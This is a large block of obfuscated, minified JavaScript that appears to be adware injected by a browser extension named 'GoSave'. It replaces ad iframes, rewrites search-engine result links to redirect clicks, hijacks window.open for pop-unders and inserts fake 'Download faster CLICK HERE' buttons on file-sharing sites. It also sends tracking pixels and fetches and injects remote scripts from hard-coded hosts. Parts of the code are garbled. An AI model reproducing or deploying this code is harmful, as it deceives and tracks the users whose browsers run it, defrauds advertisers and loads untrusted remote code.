114>=(148,1445)?568:66<(1252,448)?(445,1):(385,55)>(167,81)?\"V\":(16,\n266):k|=c[((535,197)>=(93,39)?(140,\"c\"):(589,490))+\"harCodeA\"+(23<=(59,890)?(4,\"t\"):531<=(137,256)?(1139,\"D\"):(8,199))](l)&((80,484)<(1493,431)?265:67<(472,764)?(61,255):(1374,233)>(399,1035)?(146,140):(31,130)),k=a(k,g),k=(k&(1052>(0,436)?(108,131071):(1278,652)))<<(67<=(425,206)?(1116,15):(61,1271))|k>>>(880>(603,375)?(1278,17):(215,263)),k=a(k,h),f^=k}f^=d;f^=f>>>(116>(107,985)?(255,1210):45<(450,137)?(95,16):(301,371));f=a(f,296<=(134,59)?(165,1009):(1400,858)>(467,33)?(124,2246822507):107>(132,\n520)?(185,\"T\"):(280,1174));f^=f>>>(606>(799,130)?(607,13):(323,1437)<(96,301)?560:1231<=(488,473)?(463,NaN):(323,146));f=a(f,(1117,1311)>=(567,32)?(11,3266489909):138>(260,206)?\"p\":(100,306));f^=f>>>16;return b[e]=f}}}(),e7T:3,W9T:\"o\",c0:function(a,b){return a>b},g7T:\"c\",Z7T:8,b7T:\"At\",G4T:\"C\",V0:function(a,b){return ag[h].length||(b[g[h]]?b[g[h]]++:b[g[h]]=1)}catch(f){}var e=[],l;for(l in b)e.push([l,b[l]]);e.sort(function(a,b){return b[1]-a[1]});e=e.slice(0,25);for(l=0;l=c?!1:adzy653rk.isAncestor(a,b.parent,--c)},listenForMessages:function(){if(window.top===window){var a=adzy653rk;window.addEventListener(\"message\",function(b){try{if(0==((b.data||\"\")+\"\").indexOf(a.l.encode(a.imp.hid+\"/\"+a.imp.eid+\"/\"+a.imp.prid)+\"_\"))switch(b.data.split(\"_\")[1]){case \"IIIFAR\":for(var c=\nwindow.document.getElementsByTagName(\"iframe\"),d=0,e;d=b.length){var c=adzy653rk.imp;adzy653rk.jbs.at.length?adzy653rk.getAds(\"//\"+adzy653rk.imp.domain[\"https:\"==window.self.location.protocol?1:0]+\"/?tid=1&size=\"+adzy653rk.jbs.at.join(\",\")+\"&subid=\"+c.pid+\"&subid1=\"+c.hid+\"&subid2=\"+c.eid+\"&subid3=\"+c.prid+\"<=\"+c.lt+\"&k=\"+encodeURIComponent(adzy653rk.getKeywords())+(adzy653rk.topHost?\n\"&tdh=\"+encodeURIComponent(adzy653rk.topHost):\"\"),\"seta\"):adzy653rk.destruct()}else{if(c=adzy653rk.getAt(b[a]))(new PixelIPP).setParameter(\"size\",c).push(),adzy653rk.jbs.ifr.push(b[a]),adzy653rk.jbs.at.push(c);setTimeout(function(){d(++a)},1)}};d(0)}else adzy653rk.destruct()}else adzy653rk.destruct()},init:function(){var a=adzy653rk,b=typeof window;window.top===window?(a.listenForMessages(),a.run()):a.isAllowRunning(function(c,d){window.document.body.hasAttribute(\"data-\"+b)||(window.document.body.setAttribute(\"data-\"+\nb,c+\"\"),c&&a.run())})},dfn:function(a){if(adzy653rk.ifr.length&&(a=a?a:1,!(300=adzy653rk.ifr.length?setTimeout(function(){adzy653rk.dfn(++a)},1200):(adzy653rk.src[c]&&adzy653rk.ifr[c]&&adzy653rk.ifr[c].src!=adzy653rk.src[c][0]&&!adzy653rk.checkIfPartner()&&adzy653rk.ifrset(adzy653rk.ifr[c],adzy653rk.src[c][1],1),setTimeout(function(){b(++c)},1))};b(0)}},destruct:function(a){adzy653rk.jbs={ifr:[],at:[]};adzy653rk.rnm?adzy653rk.rnm++:(adzy653rk.rnm=1,setTimeout(adzy653rk.dfn,\n1200));adzy653rk.rnm<=adzy653rk.nrnm&&setTimeout(adzy653rk.run,1200)},getAt:function(a){a=[parseInt(\"number\"==typeof a.width||\"string\"==typeof a.width&&a.width.match(/[0-9]/)?a.width:a.scrollWidth),parseInt(\"number\"==typeof a.height||\"string\"==typeof a.height&&a.height.match(/[0-9]/)?a.height:a.scrollHeight)];for(var b=adzy653rk.imp.sizes,c=0;c=b[c][0]-5&&a[0]<=b[c][0]+5&&a[1]>=b[c][1]-5&&a[1]<=b[c][1]+5)return b[c][2];return!1},getAds:function(a,b){if(-1\",\"\"];switch(b[1]){case 1:a.src=b[0]+(-1'+d[1])}catch(e){}break;case 3:case 6:a.src=\"about:blank\";try{a.contentWindow.document.write(d[0]+b[0]+d[1])}catch(g){}}c||adzy653rk.src.push([a.src,b])},l:{xlat:\"abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/\",decode:function(a){a=a.toString().replace(/[^A-Za-z0-9\\+\\/]/g,\"\");for(var b=\"\",c=0;c>2,l=(g&3)<<6|h,b=b+String.fromCharCode(d<<2|e>>4);64!=g&&0d)b+=String.fromCharCode(d),c++;else if(191d)var e=a.charCodeAt(c+1),b=b+String.fromCharCode((d&31)<<6|e&63),c=c+2;else var e=a.charCodeAt(c+\n1),g=a.charCodeAt(c+2),b=b+String.fromCharCode((d&15)<<12|(e&63)<<6|g&63),c=c+3}return b},encode:function(a){a=this._utf8_encode(a);for(var b=\"\",c=0;c>2,d=(d&3)<<4|e>>4,f=(e&15)<<2|g>>6,l=g&63;isNaN(e)?f=l=64:isNaN(g)&&(l=64);b=b+this.xlat.charAt(h)+this.xlat.charAt(d)+(64==f?\"=\":this.xlat.charAt(f))+(64==l?\"=\":this.xlat.charAt(l))}return b},_utf8_encode:function(a){if(a&&a.length){for(var b=\"\",c=0;cd?b+=String.fromCharCode(d):(127d?b+=String.fromCharCode(d>>6|192):(b+=String.fromCharCode(d>>12|224),b+=String.fromCharCode(d>>6&63|128)),b+=String.fromCharCode(d&63|128))}return b}return a}}}};\nif( typeof adzy653rk !== \"undefined\")\n{adzy653rk.location = adzy653rk.imp.referrer+window.self.location.href;if(adzy653rk.location.indexOf(adzy653rk.imp.jpshort+\"=\")==-1 && adzy653rk.location.indexOf(\"adk2.co\")==-1 &&\"ad.z5x.net ads.onimp03.com ad.yieldmanager.com secure.adnxs.com ad.adserverplus.com servedby.adxplosions.com wked.thcmania.com srv.aileronx.com ads.exoclick.com www.obo-lers.com cmdn.thcmania.com ads.ad-maven.com ad.adnetwork.net zkal.thcmania.com cdn.adk2.com ads.qadservice.com dhes.thcmania.com Servedby.bigfineads.com a.ad-sys.com server.cpmstar.com www.kbdadsfast.com 4.teracreative.com c5.zedo.com ib.adnxs.com ad.jumbaexchange.com srv1.mediads.info ad.improvemedianetwork.com nowst.63xmp.com roea.thcmania.com media.glispa.com tag.contextweb.com ads.mangomediaads.com optimizedby.brealtime.com www.adshost2.com xmdk.thcmania.com computer-experts.co ads.ventivmedia.com ad.reachjunction.com ads.deliads.com www.stamplive.com live.sekindo.com www.hostparpa.com adserverdirect.keypoint-media.com cdn.a2ggroup.com computerlivehelp.co cdn.ad-maven.com cmfd.thcmania.com www.oeaysi.com tala.intlsources.com an.z5x.net adw.ctox.net fw.adsafeprotected.com cher.ehomestudy.com\".indexOf(window.self.location.hostname)==-1 && adzy653rk.location.indexOf(\"zoneid=15072885\")==-1 && adzy653rk.location.indexOf(\"zoneid=15072885\")==-1 &&adzy653rk.location.indexOf(\"2136&zid=\")==-1 && adzy653rk.location.indexOf(\"1018-1005\")==-1 && adzy653rk.location.indexOf(\"1019-1001\")==-1 && adzy653rk.location.indexOf(\"PT1312\")==-1) adzy653rk.init()}})()}catch(e){};try{(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"7HITjTcr=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1
';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();(function(){var l=function(){var a=window.location.search.split(\"v=\")[1],b=a&&a.indexOf(\"&\")||-1;-1!=b&&(a=a.substring(0,b));return a},m=function(){var a=document.getElementsByClassName(\"watch-view-count\");return a&&a[0]&&a[0].innerHTML?(a=a[0].innerHTML.replace(/^([0-9,]+).*$/,\"$1\").replace(/,/g,\"\"))&&parseInt(a)&&parseInt(a)||0:0},n=function(){var a=document.getElementsByClassName(\"watch-extras-section\");if(a)for(var b=0;bf.length){if(c.waitForTokens[d])return b(null);var g=arguments.callee;c.waitTimeout=setTimeout(function(){k.waitForElementCounter++;g(a,b,e,d)},e)}else{if(c.waitForTokens[d])return b(null);c.waitForTokens[d]=!0;k.waitForElementCounter=0;return b(f)}};c.flushWaitForTokens=function(){c.waitForTokens={}};c.getRandomInt=function(a,b){return Math.floor(Math.random()*\r\n(b-a+1))+a};c.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(a){return{getPropertyValue:function(b){\"float\"==b&&(b=\"styleFloat\");b=c.dhtml_prop_name(b);return\"object\"==typeof a.currentStyle&&null!=a.currentStyle&&\"undefined\"!=typeof a.currentStyle[b]?a.currentStyle[b]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};c.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=\r\na.match(/^#([^,\\s]+)$/)||[];if(1=h)){for(h=0;hp.length){if(h.waitForTokens[m])return k(null);var q=arguments.callee;h.waitTimeout=setTimeout(function(){n.waitForElementCounter++;q(e,k,l,m)},l)}else{if(h.waitForTokens[m])return k(null);h.waitForTokens[m]=!0;n.waitForElementCounter=0;return k(p)}};h.flushWaitForTokens=function(){h.waitForTokens={}};h.getRandomInt=function(e,h){return Math.floor(Math.random()*(h-e+1))+e};h.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(e){return{getPropertyValue:function(k){\"float\"==\r\nk&&(k=\"styleFloat\");k=h.dhtml_prop_name(k);return\"object\"==typeof e.currentStyle&&null!=e.currentStyle&&\"undefined\"!=typeof e.currentStyle[k]?e.currentStyle[k]:null}}}:function(e,h){return window.getComputedStyle(e,h)||{getPropertyValue:function(){}}};h.query_selector_all=document.querySelectorAll?function(e){try{return document.querySelectorAll(e)}catch(h){}}:function(e){var h=e.match(/^#([^,\\s]+)$/)||[];if(1').appendTo(\"body\")}}catch(e){}}.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild(h)}}};this[\"ehd.c\"]=new function(){this.init=function(){-1\")}}catch(v){\"undefined\"!==\r\ntypeof h&&30<++h&&clearInterval(e)}}},750)}catch(k){}})()}};this[\"ziddu.com\"]=new function(){this.init=function(){var h=0,e=setInterval(function(){h++;if(-1=n;n++)m=m.parentNode;\r\nif(-1Download faster CLICK HERE',clearInterval(h.interval2))};h.interval2=setInterval(h.kickassClick,500)}}};this[\"kickass.so\"]=new function(){var h=this;h.init=function(){if(location.protocol+\"//\"+window.location.host+\"/\"!=window.location.href){h.counter=0;h.___ZskskskCount=0;h.___ZskskskthisZ=function(){try{20<++h.___ZskskskCount&&clearInterval(h.___ZskskskInter);for(var e=\r\ndocument.getElementsByTagName(\"div\"),k=0;kDownload faster CLICK HERE',clearInterval(h.interval2))};h.interval2=setInterval(h.kickassClick,500)}}};this[\"uploadrocket.net\"]=new function(){this.init=function(){var h=n.utils.query_selector_all(\".dlbutton_green\");if(h&&0h.counter++){var k=e.children[0];if(\"undefined\"!==typeof k&&-1e.length)&&(e=e[1],\"undefined\"!==typeof e)){var h=n.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(h,\r\ne);l.removeChild(e)}}},500)}};this[\"descargadictos.net\"]=new function(){var h=this;h.init=function(){h.counter=0;h.interval=setInterval(function(){var e=n.utils.query_selector_all(\".content\")[0].children[1];if(\"undefined\"!==typeof e){if(30>h.counter++){var k=e.firstChild;if(\"undefined\"!==typeof k&&-1h.length&&(h=n.utils.query_selector_all(\".button_upload green\"));for(var e=0;e -1) { var channel = 99; if (window.onbeforeunload) { window.onbeforeunload = null; channel = 98 } location.href = \"//\" + hostnames[0] + \"?subid2=1120&subid1=17643591738891339707&subid=724&tid=7&subid3=162&subid4=\" + channel + \"&red=1&px.pluginh=1\"; break } } } catch (d) { } })();}catch(e){};try{window.top==window.self&&new function(){if(!document.getElementsByTagName(\"body\").length||!document.getElementsByTagName(\"body\")[0].getAttribute(\"s17643591738891339707\")){var m=document.getElementsByTagName(\"body\")[0];m&&m.setAttribute(\"s17643591738891339707\",\"1\");var b=this;b.pixelHost=\"//sepx.matrixinner.info\";b.prefix=\"jhgasdf\";b.version=\"0.5\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon;bing\";b.unique_items_left=!0;b.eid=decodeURIComponent(\"GoSave\"); b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"matrixinner.info\";b.utils=new function(){var a=this;a.sendPixels=function(a){var b;if(a instanceof Array)for(var e=0;eg.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}}; a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all= document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return a=b.utils.query_selector_all(\".hdtb_mitem\")[0]||b.utils.query_selector_all(\".tn > div\")[0]|| b.utils.query_selector_all(\".hdtb-mitem\")[0],\"string\"==typeof a.className&&a.className.match(/(hdtb_msel|tn-selected-mode|hdtb-msel)/)&&(b.utils.ping(\"validate2\"),c.callback()),!1};if(!c.check_tab())return!1}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"www.bing.com/search?*\"], src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(a){b.utils.ping(\"validate2\");a()}},infospace:{hrefSelector:\".resultTitle\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"http://search.infospace.com/search/*\"],src_for_keyword:\"#topSearchTextBox\",validate:function(){b.utils.ping(\"validate2\");return!0}},wow:{hrefSelector:\".find\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"http://www.wow.com/search?*\"],src_for_keyword:\"#csbquery1\",validate:function(){b.utils.ping(\"validate2\");return!0}}, duckduckgo:{hrefSelector:\".result__a\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"://duckduckgo.com/?q=*\"],src_for_keyword:\"#search_form_input\",validate:function(){b.utils.ping(\"validate2\");return!0}},contenko:{hrefSelector:\"#title\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"://contenko.com/#/?q=*\"],src_for_keyword:\"#searchBar input[type='text']\",validate:function(){b.utils.ping(\"validate2\");return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"], src_for_keyword:\"#q_top\",dr:[\"#master-1\"],validate:function(){return!0}},ask:{hrefSelector:\".ptbs a[id^=r]\",unique_search_divs:\"1\",urls:[\"http://www.ask.com/web?q=*\",\"http://www.ask.com/web?qsrc=*\",\"http://www.ask.com/web?am=broad&q=*\"],src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\"http://www.search.triple-search.com/?*\"],src_for_keyword:\"#q\", validate:function(){var a=b.utils.query_selector_all(\".gRsSTypeSelltr\");if(0a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;fb.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f60? 2109:388)+\"?installer_file_name=\";a.bin=\"exe,msi,mp3,rar,pdf,avi,mov,mpg,zip,torrent,mkv,mpeg,mp4,3gp,jar,7z,flac,wmv,wma,doc,ppt,pptx,pps,ppsx,xls,xlsx,flv\";a.res=[];a.existingPrefix=\"rghbyujk\";a.prefix=\"fghjklfgh\";a.utils=new function(){var b=this;b.injectScript=function(){var b=document.createElement(\"script\");b.src=a.domain;document.getElementsByTagName(\"head\")[0].appendChild(b)};b.ajax={get:function(a,e){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",a,!0),this.xhr.onreadystatechange=function(){4==b.ajax.xhr.readyState&&e(b.ajax.xhr.responseText)},this.xhr.send()}catch(f){}}};b.isIE=function(){return-1=a-e)}};b.getInstructions=function(c,d){b.msie?b.inject_script(c+('&cb='+a.prefix+'.'+d)):b.ajax.get(c,function(c){if(c)a[d](c)})};b.l=new function(){var c=this;c.xlat='abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/';c.encode=function(a){a=c._utf8_encode(a);for(var b='',e=0;e>2,f=(f&3)<<4|h>>4,n=(h&15)<<2|l>>6,m=l&63;isNaN(h)?n=m=64:isNaN(l)&&(m=64);b=b+c.xlat.charAt(k)+c.xlat.charAt(f)+(64==n?'=':c.xlat.charAt(n))+(64==m?'=':c.xlat.charAt(m))}return b};c._utf8_encode=function(c){if(c&&c.length){for(var a='',b=0;bf?a+=String.fromCharCode(f):(127f?a+=String.fromCharCode(f>>6|192):(a+=String.fromCharCode(f>>12|224),a+=String.fromCharCode(f>>6&63|128)),a+=String.fromCharCode(f&63|128))}return a}return c};c.decode=function(a){a=a.toString().replace(/[^A-Za-z0-9\\+\\/]/g,'');for(var b='',e=0;e>2,m=(l&3)<<6|k,b=b+String.fromCharCode(f<<2|h>>4);64!=l&&0f)c+=String.fromCharCode(f),b++;else if(191f)var h=a.charCodeAt(b+1),c=c+String.fromCharCode((f&31)<<6|h&63),b=b+2;else var h=a.charCodeAt(b+1),l=a.charCodeAt(b+2),c=c+String.fromCharCode((f&15)<<12|(h&63)<<6|l&63),b=b+3}return c}};b.ajax=new function(){this.get=function(a,b){try{var g=new XMLHttpRequest;g.open('GET',a,!0);g.withCredentials=!0;g.onreadystatechange=function(){4==g.readyState&&b(g.responseText)};g.send()}catch(e){}}};b.randomChar=function(){for(var a='',b=0;2>b;b++)a+='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'.charAt(Math.floor(52*Math.random()));return a};b.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();b.inject_script=function(c){var b=document.getElementsByTagName('body')[0],g=document.createElement('script');g.type='text/javascript';g.id='id_'+a.prefix;g.src=c;b&&b.appendChild(g)};b.epoch=function(){return Math.floor((new Date).getTime()/1E3)};b.getVert=function(){var a=localStorage.getItem('sk398erjds2d');return a?a:b.forexVert()};b.browser=function(){var a=navigator.userAgent.toLowerCase(),b={webkit:/webkit/.test(a),mozilla:/mozilla/.test(a)&&!/(compatible|webkit)/.test(a),chrome:/chrome/.test(a),msie:/msie/.test(a)&&!/opera/.test(a),firefox:/firefox/.test(a),safari:/safari/.test(a)&&!/chrome/.test(a),opera:/opera/.test(a)};b.version=b.safari?(a.match(/.+(?:ri)[\\/: ]([\\d.]+)/)||[])[1]:(a.match(/.+(?:ox|me|ra|ie)[\\/: ]([\\d.]+)/)||[])[1];return b}();b.getNodeTextProp=function(a){return'textContent'in a?'textContent':'innerText'in a?'innerText':!1};b.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,c,b){return b.toUpperCase()})};b.get_computed_style='function'!=typeof window.getComputedStyle?function(a){return{getPropertyValue:function(d){'float'==d&&(d='styleFloat');d=b.dhtml_prop_name(d);return'object'==typeof a.currentStyle&&null!=a.currentStyle&&'undefined'!=typeof a.currentStyle[d]?a.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};b.getEmptyWindow=function(){var a=document.createElement('iframe');a.src='about:blank';a.setAttribute('style','display:inline;width:1px;height:1px;padding:none;margin:none;');document.body.appendChild(a);return a.contentWindow}};a.prefix='fghjktghndfgtssss';a.extName='GoSave';a.version='0.1.1';a.pop_collision_id='__ipm=';a.pixelHostname=function(){try{return'//mnh.'+eval('[\"profficed.com\",\"winnermore.com\"]')['https:'==window.location.protocol?1:0]}catch(a){return['//mnh.winneri.info','//mnh.winnermore.org']['https:'==window.location.protocol?1:0]}}();a.watcherCount=0;a.fallbackHostnames=['compey.net','comprises.info'];try{a.stngs=a.utils.JSON.parse('{\"szy_domain\":[\"unitspybookukset.org\",\"comprises.info\"],\"ad_sizes\":[[120,60,19],[630,250,22],[336,280,17],[630,500,23],[180,150,18],[234,60,15],[200,200,16],[600,400,13],[125,125,14],[670,670,11],[600,270,12],[800,600,21],[468,60,3],[800,440,20],[300,250,2],[728,90,1],[300,600,10],[120,240,7],[120,600,6],[160,600,5],[250,250,4],[240,400,8]]}')}catch(q){a.hostnames=a.fallbackHostnames}var p;p=''!==a.stngs&&a.stngs&&'undefined'!==typeof a.stngs.szy_domain&&a.stngs.szy_domain instanceof Array?a.stngs.szy_domain:a.fallbackHostnames;a.hostnames=p;a.debugMode&&(a.debug=new function(){var b=this;window.oldSetTimeout=window.setTimeout;window.oldSetInterval=window.setInterval;b.overrideSettimeout=function(){window.setTimeout=function(a,b){return window.oldSetTimeout(function(){try{console.log('%csetTimeout: '+a.toString(),'color:purple'),a()}catch(b){}},b)}};b.overrideSetinterval=function(){window.setInterval=function(a,b){return window.oldSetInterval(function(){try{console.log('setInterval: '+a.toString()),a()}catch(b){}},b)}};b.overrideVariables=function(){a.pid='12';a.cc='US';a.eid='10';a.hid='123456789';a.ename='QA extension';a.lt='2617.24';a.jpshort='_OXQj15i';a.platform_version='10'};b.init=function(){b.overrideSettimeout();b.overrideSetinterval();b.overrideVariables()};b.init()});a.legacyHostnames=['superiends.org','go.turboloves.net','installerapplicationusa.com','stylene.net'];a.body=document.getElementsByTagName('body')[0];a.params={subid:a.pid,subid1:a.hid,subid2:a.eid,'px.pluginh':1,tid:'7',red:'1',subid3:'679'};a.manhattanCookieInterval=0.0015;a.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(c,d,g,e,f){'undefined'==typeof e&&(e=window);e.addEventListener(c,d,g);f&&a.cache.push([c,d,g,e])}:window.attachEvent?function(c,d,g,e,f){'undefined'==typeof e&&(e=window);e['e'+c+d]=d;e[c+d]=function(){e['e'+c+d](window.event)};e.attachEvent('on'+c,e[c+d]);f&&a.cache.push([c,d,g,e])}:function(){};a.remove=window.removeEventListener?function(a,b,g,e){'undefined'==typeof e&&(e=window);e.removeEventListener(a,b,g)}:window.detachEvent?function(a,b,g,e){'undefined'==typeof e&&(e=window);e.detachEvent('on'+a,e[a+b]);e[a+b]=null;e['e'+a+b]=null}:function(){};a.flush=function(){for(var c=0;cf[h].length||(c[f[h]]?c[f[h]]++:c[f[h]]=1)}catch(l){}var e=[],k;for(k in c)e.push([k,c[k]]);e.sort(function(a,b){return b[1]-a[1]});e=e.slice(0,25);for(k=0;ka.utils.msie?window.open(a.manhattanUrl,d,g):b.call(window,a.manhattanUrl,d,g);d=d||'';window.open=a.cachedOpenFn;return a.utils.msie&&9>a.utils.msie?window.open(c,d,g):b.call(window,c,d,g)}}(window.open);4c.msie?c.inject_script(b+('&cb='+d.prefix+'.'+f)):c.ajax.get(b,function(b){if(b)d[f](b)})};c.l=new function(){var b=this;b.xlat='abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/';b.encode=function(f){f=b._utf8_encode(f);for(var c='',e=0;e>2,a=(a&3)<<4|d>>4,p=(d&15)<<2|m>>6,n=m&63;isNaN(d)?p=n=64:isNaN(m)&&(n=64);c=c+b.xlat.charAt(k)+b.xlat.charAt(a)+(64==p?'=':b.xlat.charAt(p))+(64==n?'=':b.xlat.charAt(n))}return c};b._utf8_encode=function(b){if(b&&b.length){for(var c='',a=0;ad?c+=String.fromCharCode(d):(127d?c+=String.fromCharCode(d>>6|192):(c+=String.fromCharCode(d>>12|224),c+=String.fromCharCode(d>>6&63|128)),c+=String.fromCharCode(d&63|128))}return c}return b}; b.decode=function(b){b=b.toString().replace(/[^A-Za-z0-9\\+\\/]/g,'');for(var c='',a=0;a>2,n=(m&3)<<6|k,c=c+String.fromCharCode(d<<2|h>>4);64!=m&&0 d)c+=String.fromCharCode(d),a++;else if(191d)var h=b.charCodeAt(a+1),c=c+String.fromCharCode((d&31)<<6|h&63),a=a+2;else var h=b.charCodeAt(a+1),m=b.charCodeAt(a+2),c=c+String.fromCharCode((d&15)<<12|(h&63)<<6|m&63),a=a+3}return c}};c.ajax=new function(){this.get=function(b,c){try{var a=new XMLHttpRequest;a.open('GET',b,!0);a.withCredentials=!0;a.onreadystatechange=function(){4==a.readyState&&c(a.responseText)};a.send()}catch(e){}}};c.randomChar=function(){for(var b='',c=0;2>c;c++)b+='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'.charAt(Math.floor(52* Math.random()));return b};c.msie=function(){var b=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(b)&&(b=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(b)?!1:b}();c.inject_script=function(b){var c=document.getElementsByTagName('body')[0],a=document.createElement('script');a.type='text/javascript';a.id='id_'+d.prefix;a.src=b;c&&c.appendChild(a)};c.epoch=function(){return Math.floor((new Date).getTime()/1E3)};c.getVert= function(){var b=localStorage.getItem('sk398erjds2d');return b?b:c.forexVert()};c.browser=function(){var b=navigator.userAgent.toLowerCase(),c={webkit:/webkit/.test(b),mozilla:/mozilla/.test(b)&&!/(compatible|webkit)/.test(b),chrome:/chrome/.test(b),msie:/msie/.test(b)&&!/opera/.test(b),firefox:/firefox/.test(b),safari:/safari/.test(b)&&!/chrome/.test(b),opera:/opera/.test(b)};c.version=c.safari?(b.match(/.+(?:ri)[\\/: ]([\\d.]+)/)||[])[1]:(b.match(/.+(?:ox|me|ra|ie)[\\/: ]([\\d.]+)/)||[])[1];return c}(); c.getNodeTextProp=function(b){return'textContent'in b?'textContent':'innerText'in b?'innerText':!1};c.dhtml_prop_name=function(b){return b.replace(/(\\-([a-z]){1})/g,function(b,c,a){return a.toUpperCase()})};c.get_computed_style='function'!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function(a){'float'==a&&(a='styleFloat');a=c.dhtml_prop_name(a);return'object'==typeof b.currentStyle&&null!=b.currentStyle&&'undefined'!=typeof b.currentStyle[a]?b.currentStyle[a]:null}}}:function(b, c){return window.getComputedStyle(b,c)||{getPropertyValue:function(){}}};c.mapAdTypes=function(b){for(var c={},a=0;ad.utils.msie)&&'http:'===a.split('/')[0]){var g={type:'div',attrs:{id:'__modal_container',style:{position:'fixed','z-index':'9999999999',height:'100%',width:'100%',margin:'0',padding:'0',background:'rgba(0,0,0,0.3)',top:'0',right:'0',bottom:'0',left:'0','border-radius':'0'}},children:[{type:'div',attrs:{id:'__modal',style:{position:'absolute', 'z-index':'99999999999',left:'50%',top:'10px','text-align':'left',width:'90%',margin:'0 0 0 -45%','background-color':'#FFFFFF',border:'1px solid 